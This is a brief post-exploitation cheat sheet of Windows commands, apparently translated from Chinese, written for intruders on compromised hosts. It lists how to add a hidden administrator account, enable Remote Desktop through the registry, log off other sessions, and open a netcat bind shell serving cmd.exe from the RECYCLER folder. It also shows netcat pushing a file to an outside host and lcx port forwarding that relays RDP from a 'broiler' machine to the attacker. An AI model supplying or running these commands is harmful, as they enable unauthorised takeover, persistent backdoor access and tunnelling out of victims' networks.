Add account
net user seayace seay /add Create account, username seayace password seay
net localgroup Administrators seayace /add Elevate to administrator privileges
Open 3389
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD / d 0 /f
query user View session
logoff ID number kick off
C:\RECYCLER\Chu.exe "logoff 1"
NC bounce
path \nc.exe -l -p port -t -e path\cmd.exe
c:\RECYCLER \nc.exe -l -p 1234 -t -ec:\RECYCLER\cmd.exe
NC upload
and run under DOS interface:
NC -vv www.baidu.com 80<1.txt
-vv: echo
80: www port
1 .txt: is the packet you want to send
LCX port forwarding
First listen locally on port 51 lcx.exe -listen 51 3389
c:\recycler\lcx.exe -slave own ip 51 broiler IP 3389 LCX forwarding
c:\recycler\lcx.exe -slave 222.222.222.222 51 111.111.111.111 3389